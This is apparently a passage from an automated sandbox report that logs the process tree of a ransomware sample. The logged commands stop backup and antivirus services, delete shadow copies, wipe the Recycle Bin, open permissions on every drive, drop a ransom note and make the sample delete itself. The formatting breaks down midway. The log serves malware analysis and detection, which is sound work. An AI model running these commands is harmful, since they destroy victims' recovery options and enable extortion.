    C:\Windows\system32\net.exe
      Command line: "net.exe" stop veeam /y
      PID:1376
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop veeam /y
          PID:1380

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop PDVFSService /y
      PID:1816
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop PDVFSService /y
          PID:1828

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop BackupExecVSSProvider /y
      PID:1792
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop BackupExecVSSProvider /y
          PID:1784

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop BackupExecAgentAccelerator /y
      PID:1768
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
          PID:568

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop BackupExecAgentBrowser /y
      PID:368
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
          PID:1516

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop BackupExecDiveciMediaService /y
      PID:300
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
          PID:1624

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop BackupExecJobEngine /y
      PID:1256
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop BackupExecJobEngine /y
          PID:1600

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop BackupExecManagementService /y
      PID:1564
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop BackupExecManagementService /y
          PID:1568

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop BackupExecRPCService /y
      PID:1908
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop BackupExecRPCService /y
          PID:1900

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop AcrSch2Svc /y
      PID:1984
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop AcrSch2Svc /y
          PID:1972

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop AcronisAgent /y
      PID:2032
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop AcronisAgent /y
          PID:1100

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop CASAD2DWebSvc /y
      PID:1200
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop CASAD2DWebSvc /y
          PID:1488

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop CAARCUpdateSvc /y
      PID:1084
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop CAARCUpdateSvc /y
          PID:544

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop sophos /y
      PID:1060
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop sophos /y
          PID:1612

    C:\Windows\system32\sc.exe
      Command line: "sc.exe" config SQLTELEMETRY start= disabled
      PID:1616

    C:\Windows\system32\sc.exe
      Command line: "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      PID:1068

    C:\Windows\system32\sc.exe
      Command line: "sc.exe" config SQLWriter start= disabled
      PID:1092

    C:\Windows\system32\sc.exe
      Command line: "sc.exe" config SstpSvc start= disabled
      PID:1380

    C:\Windows\system32\taskkill.exe
      Command line: "taskkill.exe" /IM mspub.exe /F
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
      PID:1852

    C:\Windows\system32\taskkill.exe
      Command line: "taskkill.exe" /IM mydesktopqos.exe /F
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
      PID:1324

    C:\Windows\system32\taskkill.exe
      Command line: "taskkill.exe" /IM mydesktopservice.exe /F
      - Suspicious use of AdjustPrivilegeToken
      - Kills process with taskkill
      PID:1000

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" Delete Shadows /all /quiet
      - Interacts with shadow copies
      PID:1936

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
      - Interacts with shadow copies
      PID:1116

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
      - Interacts with shadow copies
      PID:780

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
      - Interacts with shadow copies
      PID:744

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
      - Interacts with shadow copies
      PID:1212

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
      - Interacts with shadow copies
      PID:520

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
      - Interacts with shadow copies
      PID:1624

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
      - Interacts with shadow copies
      PID:1632

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
      - Interacts with shadow copies
      PID:2028

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
      - Interacts with shadow copies
      PID:212

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
      - Interacts with shadow copies
      PID:1556

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
      - Interacts with shadow copies
      PID:1044

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
      - Interacts with shadow copies
      PID:1508

    C:\Windows\system32\vssadmin.exe
      Command line: "vssadmin.exe" Delete Shadows /all /quiet
      - Interacts with shadow copies
      PID:1524

    C:\Windows\system32\cmd.exe
      Command line: "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
      PID:1848

    C:\Windows\system32\arp.exe
      Command line: "arp" -a
      PID:1600

    C:\Windows\system32\icacls.exe
      Command line: "icacls.exe" A:\* /grant Everyone:F /T /C /Q
      - Modifies file permissions
      PID:608

    C:\Windows\system32\icacls.exe
      Command line: "icacls.exe" B:\* /grant Everyone:F /T /C /Q
      - Modifies file permissions
      PID:236

    C:\Windows\system32\icacls.exe
      Command line: "icacls.exe" D:\* /grant Everyone:F /T /C /Q
      - Modifies file permissions
      PID:1040

    C:\Windows\system32\icacls.exe
      Command line: "icacls.exe" E:\* /grant Everyone:F /T /C /Q
- Modifies file permissions
PID:872
-
-
C:\Windows\system32\icacls.exe"icacls.exe" F:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1612
-
-
C:\Windows\system32\icacls.exe"icacls.exe" G:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1504
-
-
C:\Windows\system32\icacls.exe"icacls.exe" H:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1804
-
-
C:\Windows\system32\icacls.exe"icacls.exe" I:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1828
-
-
C:\Windows\system32\icacls.exe"icacls.exe" J:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1932
-
-
C:\Windows\system32\icacls.exe"icacls.exe" K:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:216
-
-
C:\Windows\system32\icacls.exe"icacls.exe" L:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1560
-
-
C:\Windows\system32\icacls.exe"icacls.exe" M:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:748
-
-
C:\Windows\system32\icacls.exe"icacls.exe" N:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1080
-
-
C:\Windows\system32\icacls.exe"icacls.exe" O:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1516
-
-
C:\Windows\system32\icacls.exe"icacls.exe" P:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1056
-
-
C:\Windows\system32\icacls.exe"icacls.exe" Q:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1544
-
-
C:\Windows\system32\icacls.exe"icacls.exe" R:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:544
-
-
C:\Windows\system32\icacls.exe"icacls.exe" S:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1696
-
-
C:\Windows\system32\icacls.exe"icacls.exe" T:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1292
-
-
C:\Windows\system32\icacls.exe"icacls.exe" U:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:632
-
-
C:\Windows\system32\icacls.exe"icacls.exe" V:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1108
-
-
C:\Windows\system32\icacls.exe"icacls.exe" W:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1824
-
-
C:\Windows\system32\icacls.exe"icacls.exe" X:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1308
-
-
C:\Windows\system32\icacls.exe"icacls.exe" Y:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:232
-
-
C:\Windows\system32\icacls.exe"icacls.exe" Z:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1208
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Desktop\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1008
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Documents\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:1104
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\Pictures\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:872
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:324
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:1292
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:364
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:1104
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:1576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\System.exe2⤵
- Deletes itself
PID:324 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2012
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:2004
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1764
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1896